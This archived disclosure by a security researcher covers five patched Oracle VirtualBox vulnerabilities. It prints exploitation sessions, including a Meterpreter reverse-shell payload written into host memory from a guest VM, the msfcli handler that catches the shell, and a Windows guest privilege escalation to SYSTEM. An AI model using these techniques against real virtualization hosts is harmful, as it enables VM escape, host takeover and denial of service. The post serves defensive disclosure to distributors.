Information on recently-fixed Oracle VM VirtualBox vulnerabilities

2014-02-10T00:00:00
ID SECURITYVULNS:DOC:30292
Type securityvulns
Reporter Securityvulns
Modified 2014-02-10T00:00:00

Description

Hi there,

Recently I found a few vulnerabilities in Oracle VM VirtualBox, the open-source virtualization product. These have already been reported to the project, fixed and disclosed in the form of the recent January 2014 Oracle Critical Patch Update (at <http://www.oracle.com/technetwork/topics/security/cpujan2014-1972949.html>).

The purpose of this mail is simply to provide a few more specifics about each vulnerability to allow distributors, packagers and other users of the software to better classify them (and, of course, for the sake of freely sharing information!)

(Most of the rest of this message is a hacked-up version of the initial private disclosure to Oracle; please excuse any messed-up tenses or similar. Also, I've tried to clarify any VBox-specific terminology but it still might be lacking in places.)

These vulnerabilities were tested on both 32-bit and 64-bit versions of VirtualBox, namely: 32-bit: 4.2.16_Debianr86992 ((what was) the current Debian jessie VirtualBox package) 64-bit: 4.2.51_OSEr47061 (compiled from SVN) The SVN trunk at the time was also inspected to ensure fixes hadn't been made since these versions.

The exploitability of some of the vulnerabilities depends on the architectural width of the host; where this is the case it is explicitly mentioned. When an exploitation attempt is performed on a host not of the correct width the attempt usually leads to DOS instead.

The first two vulnerabilities are in the VMMDev device's HGCM interface, the third is in the Windows Guest Additions' Shared Folder driver and the final two are in the handling of other VMMDev request types.

  • Vuln. #1: VMMDev HGCM argument size overflow (CVE-2013-5892)

The first step in processing a HGCM (Host-Guest Communication Manager) call VMMDev request is to calculate the total size of the call's arguments. This is so the correct amount of space can be allocated for the arguments whose types (linear in/out addresses and page lists) need buffer space for transferring between guest and host memory. This calculation is performed using the "cbCmdSize" variable.

The problem lies in the fact that this calculation can easily overflow and hence the check afterward to see whether the amount of space required is too large or not will mistakenly pass. This leads to a smaller-than-actually-required amount of memory being allocated for the host-side VBOXHGCMCMD structure. This structure holds host-side HGCM call information including information on each argument (type, pointer to host buffer space, size) and the buffers themselves. This is obviously an exploitable heap overflow, but we can do better.

The aforementioned host-side buffer pointers which are then assigned to the arguments which need them can, via careful argument size choice, be lead to point to arbitrary host memory instead of within the third part of the VBOXHGCMCMD structure where they are supposed to point.

Notably, one can craft the individual argument sizes so that the buffer pointer placement routine wraps around the address space and sets the buffers to point to the head of the VBOXHGCMCMD structure, allowing one to cleanly write to the other parts of the structure, including the other argument types and host-side buffer pointers.

Using this, one can write to one of these host-side buffer pointers so that the resulting HGCM call output for that argument is sent elsewhere in the address space - a write-(almost-)what-where vulnerability of arbitrary length which is not affected by the heap/ASLR moving the HGCM structure around in memory (since the method of exploitation uses distances relative to the head of the HGCM structure itself).

This can be exploited to allow host ring 3 code execution from guest ring 0 (assuming a guest IOPL of 0). A POC exploit in the form of a Linux kernel module which takes "addr" and "val" arguments to specify where and what to write into host ring 3 memory was created (and sent in the full report): mattd@debian:~$ /sbin/modinfo vmmdev_vuln_oflow.ko filename: /home/mattd/vmmdev_vuln_oflow.ko license: Dual BSD/GPL depends: vermagic: 3.2.0-4-486 mod_unload modversions 486 parm: addr:Host-ring3 address to write to (ulong) parm: val:Value to write (UTF-8 hex) (string)

Here is an example exploitation session:

  • Start a VM $ VBoxManage startvm foo4 --type headless Waiting for VM "foo4" to power on... VM "foo4" has been successfully started.

  • Demonstrate that there is nothing written at this arbitrarily-chosen location in the host-side VBox process memory $ sudo dd if=/proc/`pidof VBoxHeadless`/mem bs=1 skip=$((0x804eff0)) count=16 2> /dev/null | hd 00000000 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................| 00000010

  • Run the exploit in the guest VM, specifying what to write and where $ ssh -p2222 root@foo4 'insmod vmmdev_vuln_oflow.ko addr=0x804eff0 val=`echo -n "Hi from guest!" | hexdump -e "/1 "\""%x"\"`'

  • Demonstrate that the string was successfully written to the aforementioned host-side location $ sudo dd if=/proc/`pidof VBoxHeadless`/mem bs=1 skip=$((0x804eff0)) count=16 2> /dev/null | hd 00000000 48 69 20 66 72 6f 6d 20 67 75 65 73 74 21 00 00 |Hi from guest!..| 00000010

  • Run the exploit in the guest VM again, this time to generate a SIGSEGV in the process $ ssh -p2222 root@foo4 'rmmod vmmdev_vuln_oflow.ko; insmod ~mattd/vmmdev_vuln_oflow.ko addr=0xdeadbeef val=4142434445' Connection to foo4 closed by remote host.

  • Demonstrate that the host-side VBox process did indeed die $ dmesg | tail -n1 [24916.950477] GuestPropSvc[12681]: segfault at deadbeef ip b758b55f sp b49091bc error 7 in libc-2.17.so[b750c000+1a9000]

  • Check out the generated core dump $ gdb /usr/lib/virtualbox/VBoxHeadless core GNU gdb (GDB) 7.6 (Debian 7.6-5) Copyright (C) 2013 Free Software Foundation, Inc. (...) Core was generated by `/usr/lib/virtualbox/VBoxHeadless --comment foo4 --startvm d8eac50d-f6d7-4b04-bf'. Program terminated with signal 11, Segmentation fault.

0 __memcpy_ia32 () at ../sysdeps/i386/i686/multiarch/../memcpy.S:98

98 ../sysdeps/i386/i686/multiarch/../memcpy.S: No such file or directory. (gdb) bt

0 __memcpy_ia32 () at ../sysdeps/i386/i686/multiarch/../memcpy.S:98

1 0xb5f0c1c4 in guestProp::Service::getProperty (this=this@entry=0xb5101048, cParms=cParms@entry=4, paParms=paParms@entry=0xaa2635dc)

at /build/virtualbox-rxXrih/virtualbox-4.2.16-dfsg/src/VBox/HostServices/GuestProperties/service.cpp:609

2 0xb5f0e7ce in guestProp::Service::call (this=0xb5101048, callHandle=0xaa263a60, u32ClientID=7, eFunction=1, cParms=4, paParms=0xaa2635dc)

at /build/virtualbox-rxXrih/virtualbox-4.2.16-dfsg/src/VBox/HostServices/GuestProperties/service.cpp:1260

3 0xb6154e8e in hgcmServiceThread (ThreadHandle=2147483665, pvUser=0x8cb89c0)

at /build/virtualbox-rxXrih/virtualbox-4.2.16-dfsg/src/VBox/Main/src-client/HGCM.cpp:603

4 0xb6153783 in hgcmWorkerThreadFunc (ThreadSelf=0x8cb8bc0, pvUser=0x8cb8a38)

at /build/virtualbox-rxXrih/virtualbox-4.2.16-dfsg/src/VBox/Main/src-client/HGCMThread.cpp:194

5 0xb743a1fe in rtThreadMain (pThread=0x8cb8bc0, NativeThread=3029375808, pszThreadName=0x8cb914c "GuestPropSvc")

at /build/virtualbox-rxXrih/virtualbox-4.2.16-dfsg/src/VBox/Runtime/common/misc/thread.cpp:712

6 0xb748a429 in rtThreadNativeMain (pvArgs=0x8cb8bc0) at /build/virtualbox-rxXrih/virtualbox-4.2.16-dfsg/src/VBox/Runtime/r3/posix/thread-posix.cpp:321

7 0xb76c7cf1 in start_thread (arg=0xb4909b40) at pthread_create.c:311

8 0xb75fafee in clone () at ../sysdeps/unix/sysv/linux/i386/clone.S:131

(gdb) x/2i $pc => 0xb758b55f <__memcpy_ia32+95>: movsw %ds:(%esi),%es:(%edi) 0xb758b561 <__memcpy_ia32+97>: rep movsl %ds:(%esi),%es:(%edi) (gdb) i r esi edi eax esi 0xb5102a74 -1257231756 edi 0xdeadbeef -559038737 eax 0x6 6 (gdb) x/6c $esi 0xb5102a74: 65 'A' 66 'B' 67 'C' 68 'D' 69 'E' 0 '\000' (gdb) fr 1

1 0xb5f0c1c4 in guestProp::Service::getProperty (this=this@entry=0xb5101048, cParms=cParms@entry=4, paParms=paParms@entry=0xaa2635dc)

at /build/virtualbox-rxXrih/virtualbox-4.2.16-dfsg/src/VBox/HostServices/GuestProperties/service.cpp:609

609 memcpy(pchBuf, pProp->mValue.c_str(), cbValue); (gdb) p pchBuf $1 = 0xdeadbeef <Address 0xdeadbeef out of bounds> (gdb) p pProp->mValue $2 = {static npos = <optimized out>, _M_dataplus = {<std::allocator<char>> = {<__gnu_cxx::new_allocator<char>> = {<No data fields>}, <No data fields>}, _M_p = 0xb5102a74 "ABCDE"}}

One can use a separate utility script that provides a series of (addr, val) pairs to insert the module with repeatedly so as to write (almost) any arbitrary binary data. It does this by suggesting to write a series of individually UTF-8 valid strings at monotonically increasing addresses. This was tested with a Meterpreter payload to get a shell on the host:

(on the VM:)

  • Show the Meterpreter almost-pure-ASCII payload foo4$ hd reverse-tcp-payload | head 00000000 54 59 da c4 d9 71 f4 5f 57 59 49 49 49 49 49 49 |TY...q._WYIIIIII| 00000010 49 49 49 49 43 43 43 43 43 43 37 51 5a 6a 41 58 |IIIICCCCCC7QZjAX| 00000020 50 30 41 30 41 6b 41 41 51 32 41 42 32 42 42 30 |P0A0AkAAQ2AB2BB0| 00000030 42 42 41 42 58 50 38 41 42 75 4a 49 50 31 49 4b |BBABXP8ABuJIP1IK| 00000040 6c 37 6a 43 52 73 52 63 70 53 53 5a 47 72 6e 50 |l7jCRsRcpSSZGrnP| 00000050 50 66 4d 59 78 61 48 4d 6b 30 6c 57 31 4b 51 78 |PfMYxaHMk0lW1KQx| 00000060 49 50 6e 48 46 61 46 30 52 48 66 62 73 30 77 61 |IPnHFaF0RHfbs0wa| 00000070 51 4c 4d 59 78 61 31 7a 73 56 63 68 56 30 63 61 |QLMYxa1zsVchV0ca| 00000080 36 37 4e 69 4b 51 63 73 48 4d 4d 50 4f 42 56 67 |67NiKQcsHMMPOBVg| 00000090 6f 49 55 50 74 50 77 70 53 30 6d 59 7a 43 6f 31 |oIUPtPwpS0mYzCo1|

  • Show the output of the aforementioned string -> (addr, val) script on the payload foo4$ ./bin2args.py $((0x8050830)) < reverse-tcp-payload | head -n5 addr=0x8050830 val=5459 addr=0x8050832 val=dabf addr=0x8050833 val=c4bf addr=0x8050834 val=d9bf addr=0x8050835 val=71

  • Use the script to write the payload into host-side VBox process memory foo4$ ./bin2args.py $((0x8050830)) < reverse-tcp-payload | sudo xargs -n2 -I{} sh -c 'rmmod vmmdev_vuln_oflow; insmod vmmdev_vuln_oflow.ko {}' Error: Module vmmdev_vuln_oflow is not currently loaded

  • Write the payload's address to a function pointer in the process foo4$ sudo rmmod vmmdev_vuln_oflow; sudo insmod vmmdev_vuln_oflow.ko addr=0x0804e6f0 val=30080508

  • Trigger the payload foo4$ sudo halt

Broadcast message from root@debian (pts/0) (Tue Oct 22 01:20:40 2013):

The system is going down for system halt NOW!

(on the attacker's end:)

  • Start a Meterpreter session and wait for connection $ msfcli exploit/multi/handler PAYLOAD=linux/x86/meterpreter/reverse_tcp LHOST=192.168.1.80 E [*] Please wait while we load the module tree... (...) =[ metasploit v4.7.0-1 [core:4.7 api:1.0]
  • -- --=[ 1141 exploits - 720 auxiliary - 194 post
  • -- --=[ 309 payloads - 30 encoders - 8 nops

PAYLOAD => linux/x86/meterpreter/reverse_tcp LHOST => 192.168.1.80 [] Started reverse handler on 192.168.1.80:4444 [] Starting the payload handler... [] Transmitting intermediate stager for over-sized stage...(100 bytes) [] Sending stage (1126400 bytes) to 192.168.1.80 [*] Meterpreter session 1 opened (192.168.1.80:4444 -> 192.168.1.80:49648) at 2013-10-22 01:20:53 +1300

meterpreter > shell Process 16070 created. Channel 1 created. /bin/sh: 0: can't access tty; job control turned off $ ps f --sid `ps -o sid $$ | tail -n+2` PID TTY STAT TIME COMMAND 15959 ? Sl 1:37 /usr/lib/virtualbox/VBoxHeadless --comment foo4 --sta 16070 ? S 0:00 \ /bin/sh 16082 ? R 0:00 \ ps f --sid 15935

Specifically, the POC uses the Shared Properties service to get attacker-controlled data to be written out as an HGCM result. It also uses this service specifically because it can handle the necessary four arguments for the exploit to function (name + skip + overflow + skip). Null page lists are used to skip address space, allowing one to write the attacker-chosen memory location to the second HGCM output argument (property value output) host buffer pointer.

On 32-bit hosts, this works fine. On 64-bit ones, because the HGCM size is calculated using a 32-bit variable ("cbCmdSize"), one cannot wrap the 64-bit address space entirely, however one can still overflow up to 4GB after the VBOXHGCMCMD structure for a traditional heap-based attack.

  • Vuln. #2: VMMDev HGCM argument type confusion (CVE-2014-0407)

Processing a HGCM call is a three step-process: reading the arguments from the guest, invoking the HGCM connector to make the call, and writing the result back out to the guest. Between these steps, when using the default HGCM connector, the guest may run for a limited amount of time (the result code returned at step 2 is VINF_HGCM_ASYNC_EXECUTE). This issue lies in the fact that the argument types are re-read from guest-controlled memory at step 3, when the result is being written out. By racing to change the type of an argument between steps 1 and 3, incorrect processing can occur. This includes things such as treating what was initially a guest-provided integer argument as the location of an argument buffer to read a result from, if the new type would normally have one.

This can be exploited to read cleanly from anywhere in host ring 3 address space - an ASLR-proof information leak of arbitrary length, complementing the first vulnerability.

This leads to a host ring 3 information leak to guest ring 0.

A POC exploit in the form of a Linux kernel module which takes an "addr" argument to specify where to read from host ring 3 memory, outputting the result to the kernel ring buffer (ie. viewable with `dmesg`) was created (and sent in the full report): mattd@debian:~$ /sbin/modinfo vmmdev_vuln_typeconf.ko filename: /home/mattd/vmmdev_vuln_typeconf.ko license: Dual BSD/GPL depends: vermagic: 3.2.0-4-486 mod_unload modversions 486 parm: addr:Host-ring3 address to read from (ulong)

Here is an example exploitation session:

  • Observe the address space of the host-side VBox process to find where the ELF itself was loaded $ sudo head /proc/`pidof VBoxHeadless`/maps 08048000-0804e000 r-xp 00000000 68:01 4083239 /usr/lib/virtualbox/VBoxHeadless 0804e000-0804f000 rw-p 00005000 68:01 4083239 /usr/lib/virtualbox/VBoxHeadless 0804f000-08051000 rw-p 00000000 00:00 0 08255000-082df000 rw-p 00000000 00:00 0 [heap] a8d00000-a8f00000 rw-s 00000000 00:04 989 /dev/zero (deleted) a8f00000-a9100000 rw-s 00000000 00:04 988 /dev/zero (deleted) a9100000-a9300000 rw-s 00000000 00:04 7084 /dev/zero (deleted) a9300000-a9500000 rw-s 00000000 00:04 981 /dev/zero (deleted) a9500000-a9700000 rw-s 00000000 00:04 980 /dev/zero (deleted) a9700000-a9900000 rw-s 00000000 00:04 7081 /dev/zero (deleted)

  • Check out the contents at the aforementioned load address $ sudo dd if=/proc/`pidof VBoxHeadless`/mem bs=1 skip=$((0x08048000)) count=256 2> /dev/null | hd 00000000 7f 45 4c 46 01 01 01 00 00 00 00 00 00 00 00 00 |.ELF............| 00000010 02 00 03 00 01 00 00 00 b4 8c 04 08 34 00 00 00 |............4...| 00000020 c8 59 00 00 00 00 00 00 34 00 20 00 08 00 28 00 |.Y......4. ...(.| 00000030 1c 00 1b 00 06 00 00 00 34 00 00 00 34 80 04 08 |........4...4...| 00000040 34 80 04 08 00 01 00 00 00 01 00 00 05 00 00 00 |4...............| 00000050 04 00 00 00 03 00 00 00 34 01 00 00 34 81 04 08 |........4...4...| 00000060 34 81 04 08 13 00 00 00 13 00 00 00 04 00 00 00 |4...............| 00000070 01 00 00 00 01 00 00 00 00 00 00 00 00 80 04 08 |................| 00000080 00 80 04 08 ec 56 00 00 ec 56 00 00 05 00 00 00 |.....V...V......| 00000090 00 10 00 00 01 00 00 00 ec 56 00 00 ec e6 04 08 |.........V......| 000000a0 ec e6 04 08 cc 01 00 00 6c 24 00 00 06 00 00 00 |........l$......| 000000b0 00 10 00 00 02 00 00 00 f8 56 00 00 f8 e6 04 08 |.........V......| 000000c0 f8 e6 04 08 f8 00 00 00 f8 00 00 00 06 00 00 00 |................| 000000d0 04 00 00 00 04 00 00 00 48 01 00 00 48 81 04 08 |........H...H...| 000000e0 48 81 04 08 44 00 00 00 44 00 00 00 04 00 00 00 |H...D...D.......| 000000f0 04 00 00 00 50 e5 74 64 8c 4d 00 00 8c cd 04 08 |....P.td.M......| 00000100

  • Run the exploit on the guest VM, specifying the host-side address to read from $ ssh -p2222 root@foo4 insmod vmmdev_vuln_typeconf.ko addr=$((0x08048000))

  • Observe the output in the guest VM's dmesg and see that it is as expected $ ssh -p2222 foo4 'dmesg | grep -A15 "vmmdev_vuln_typeconf: 00000000"' [ 477.168335] vmmdev_vuln_typeconf: 00000000: 7f 45 4c 46 01 01 01 00 00 00 00 00 00 00 00 00 .ELF............ [ 477.168393] vmmdev_vuln_typeconf: 00000010: 02 00 03 00 01 00 00 00 b4 8c 04 08 34 00 00 00 ............4... [ 477.168443] vmmdev_vuln_typeconf: 00000020: c8 59 00 00 00 00 00 00 34 00 20 00 08 00 28 00 .Y......4. ...(. [ 477.168470] vmmdev_vuln_typeconf: 00000030: 1c 00 1b 00 06 00 00 00 34 00 00 00 34 80 04 08 ........4...4... [ 477.168497] vmmdev_vuln_typeconf: 00000040: 34 80 04 08 00 01 00 00 00 01 00 00 05 00 00 00 4............... [ 477.168525] vmmdev_vuln_typeconf: 00000050: 04 00 00 00 03 00 00 00 34 01 00 00 34 81 04 08 ........4...4... [ 477.168552] vmmdev_vuln_typeconf: 00000060: 34 81 04 08 13 00 00 00 13 00 00 00 04 00 00 00 4............... [ 477.168579] vmmdev_vuln_typeconf: 00000070: 01 00 00 00 01 00 00 00 00 00 00 00 00 80 04 08 ................ [ 477.168606] vmmdev_vuln_typeconf: 00000080: 00 80 04 08 ec 56 00 00 ec 56 00 00 05 00 00 00 .....V...V...... [ 477.168633] vmmdev_vuln_typeconf: 00000090: 00 10 00 00 01 00 00 00 ec 56 00 00 ec e6 04 08 .........V...... [ 477.168675] vmmdev_vuln_typeconf: 000000a0: ec e6 04 08 cc 01 00 00 6c 24 00 00 06 00 00 00 ........l$...... [ 477.168702] vmmdev_vuln_typeconf: 000000b0: 00 10 00 00 02 00 00 00 f8 56 00 00 f8 e6 04 08 .........V...... [ 477.168729] vmmdev_vuln_typeconf: 000000c0: f8 e6 04 08 f8 00 00 00 f8 00 00 00 06 00 00 00 ................ [ 477.168756] vmmdev_vuln_typeconf: 000000d0: 04 00 00 00 04 00 00 00 48 01 00 00 48 81 04 08 ........H...H... [ 477.168784] vmmdev_vuln_typeconf: 000000e0: 48 81 04 08 44 00 00 00 44 00 00 00 04 00 00 00 H...D...D....... [ 477.168811] vmmdev_vuln_typeconf: 000000f0: 04 00 00 00 50 e5 74 64 8c 4d 00 00 8c cd 04 08 ....P.td.M......

This works fine on a 32-bit host. On 64-bit hosts, one cannot use the 'int-as-address' technique because of differing resizing + alignment issues in VBOXHGCMSVCPARM's union used to hold the argument information host-side (at least on GCC); other methods might be possible instead.

  • Vuln. #3: Windows Shared Folder Redirector IOCTL_MRX_VBOX_DELCONN missing validation (CVE-2014-0405)

When handling an IOCTL_MRX_VBOX_DELCONN request, the Windows Shared Folder Redirector attempts to retrieve the associated RDBSS file object extension (FOBX) from the user-provided file's FsContext2 field. It does not check, however, that one actually exists (is non-null), and hence the driver can be led to execute upon a user-provided FOBX by placing a crafted one in the null memory page. This execution involves calling a FOBX-provided callback, which can point to a user-provided routine.

This IOCTL is defined as FILE_ANY_ACCESS and so can be called by any Windows user, regardless of access rights.

This leads to a guest ring 3 to guest ring 0 privilege escalation (and nicely complements the guest ring 0 to host ring 3 vulnerability,

1 / CVE-2013-5892!)

A POC exploit in the form of a Windows application that executes a given command line (or cmd.exe as a default) as the SYSTEM user regardless of what user it is run as initially was created (and sent in the full report):

Here is a sample exploitation session (in the guest VM):

  • Check the current user's username and assigned groups E:\>whoami /user /groups [User] = "LOLTECH-GPG0BTT\limited"

[Group 1] = "LOLTECH-GPG0BTT\None" [Group 2] = "Everyone" [Group 3] = "BUILTIN\Users" [Group 4] = "LOCAL" [Group 5] = "NT AUTHORITY\INTERACTIVE" [Group 6] = "NT AUTHORITY\Authenticated Users"

  • Demonstrate the access level by showing that we cannot create a file in a restricted directory E:\>echo > c:\windows\test.txt Access is denied.

  • Run the exploit E:\>vboxrdr_vuln_devcontrol.exe

(... a new command prompt opens ...)

  • Check the new current user's username and assigned groups C:\WINDOWS>whoami /user /groups [User] = "NT AUTHORITY\SYSTEM"

[Group 1] = "BUILTIN\Administrators" [Group 2] = "Everyone" [Group 3] = "NT AUTHORITY\Authenticated Users"

  • Demonstrate the new access level by showing that we can now create the aforementioned file C:\WINDOWS>echo > c:\windows\test.txt

C:\WINDOWS>

On 32-bit guests this works fine, and on 64-bit ones it should also work, with the necessary changes to the crafted FOBX structure.

The last two vulnerabilities are a bit more boring.

  • Vuln. #4: VMMDev SetPointerShape missing validation (CVE-2014-0406)

The VMMDevReq_SetPointerShape request handler does not validate the given width and height against the actual amount of request data given (ie. pointerData), and hence can be made to read off the end of the request.

This leads to a guest-triggerable DOS of the host-side VBox process.

A POC exploit in the form of a Linux kernel module was created (and sent in the full report).

Here is a sample session:

  • Run the exploit in the guest VM $ ssh -p2222 root@foo4 insmod vmmdev_vuln_shape.ko Connection to foo4 closed by remote host.

  • Check out the generated core dump $ gdb /usr/lib/virtualbox/VBoxHeadless core GNU gdb (GDB) 7.6 (Debian 7.6-5) Copyright (C) 2013 Free Software Foundation, Inc. (...) Core was generated by `/usr/lib/virtualbox/VBoxHeadless --startvm foo4'. Program terminated with signal 11, Segmentation fault.

0 __memcpy_ia32 () at ../sysdeps/i386/i686/multiarch/../memcpy.S:74

74 ../sysdeps/i386/i686/multiarch/../memcpy.S: No such file or directory. (gdb) bt

0 __memcpy_ia32 () at ../sysdeps/i386/i686/multiarch/../memcpy.S:74

1 0xa8910008 in ?? ()

2 0xb329969b in vmmdevRequestHandler (pDevIns=pDevIns@entry=0xb46d8dc0, pvUser=pvUser@entry=0xb46d8e80, Port=Port@entry=53280, u32=u32@entry=102366948,

cb=cb@entry=4&#41; at /build/virtualbox-rxXrih/virtualbox-4.2.16-dfsg/src/VBox/Devices/VMMDev/VMMDev.cpp:1178

[..omitted..] (gdb) fr 2

2 0xb329969b in vmmdevRequestHandler (pDevIns=pDevIns@entry=0xb46d8dc0, pvUser=pvUser@entry=0xb46d8e80, Port=Port@entry=53280, u32=u32@entry=102366948,

cb=cb@entry=4&#41; at /build/virtualbox-rxXrih/virtualbox-4.2.16-dfsg/src/VBox/Devices/VMMDev/VMMDev.cpp:1178

1178 pointerShape->pointerData); (gdb) l 1173 pThis->pDrv->pfnUpdatePointerShape(pThis->pDrv, 1174 fVisible, 1175 fAlpha, 1176 pointerShape->xHot, pointerShape->yHot, 1177 pointerShape->width, pointerShape->height, 1178 pointerShape->pointerData); 1179 } 1180 else 1181 { 1182 pThis->pDrv->pfnUpdatePointerShape(pThis->pDrv,

This works fine regardless of host architecture width (32/64-bit).

  • Vuln. #5: Bad assert in vmmdevHGCMSaveLinPtr (CVE-2014-0404)

The AssertRelease at the end of vmmdevHGCMSaveLinPtr checks whether the amount of pages successfully saved is equal to the entire amount given. This assert can be guest-triggered by simply invoking a HGCM call with an invalid linear pointer argument.

This leads to a guest-triggerable DOS of the host-side VBox process.

A POC exploit in the form of a Linux kernel module was created (and sent in the full report).

Here is a sample session:

  • Run the exploit in the guest VM $ ssh -p2222 root@foo4 insmod vmmdev_vuln_linaddrout.ko Connection to foo4 closed by remote host.

  • Check the end of the log output from the now-dead host-side VBox process $ tail VirtualBox\ VMs/foo4/Logs/VBox.log 00:01:04.537820 NAT: DNS#0: 192.168.1.8 00:01:04.537877 NAT: DHCP offered IP address 10.0.2.15 00:01:04.539477 PATM: Disabling IDT 3a patch handler c1288334 00:01:16.994365 PATM: Disabling IDT 39 patch handler c1288330 00:01:48.235937 NAT: old socket rcv size: 128KB 00:01:48.235994 NAT: old socket snd size: 128KB 00:01:48.541291 00:01:48.541294 !!Assertion Failed!! 00:01:48.541295 Expression: iPage == cPages 00:01:48.541297 Location : /build/virtualbox-rxXrih/virtualbox-4.2.16-dfsg/src/VBox/Devices/VMMDev/VMMDevHGCM.cpp(297) int vmmdevHGCMSaveLinPtr(PPDMDEVINS, uint32_t, RTGCPTR, uint32_t, uint32_t, VBOXHGCMLINPTR, RTGCPHYS*)

This works fine regardless of host architecture width (32/64-bit).

For more procedural details such as the versions of VirtualBox that are affected and those that are not, how to get updates and other information, please see Oracle's CPU advisory itself (linked at the start of this mail.)

Cheers!

  • Matthew Daley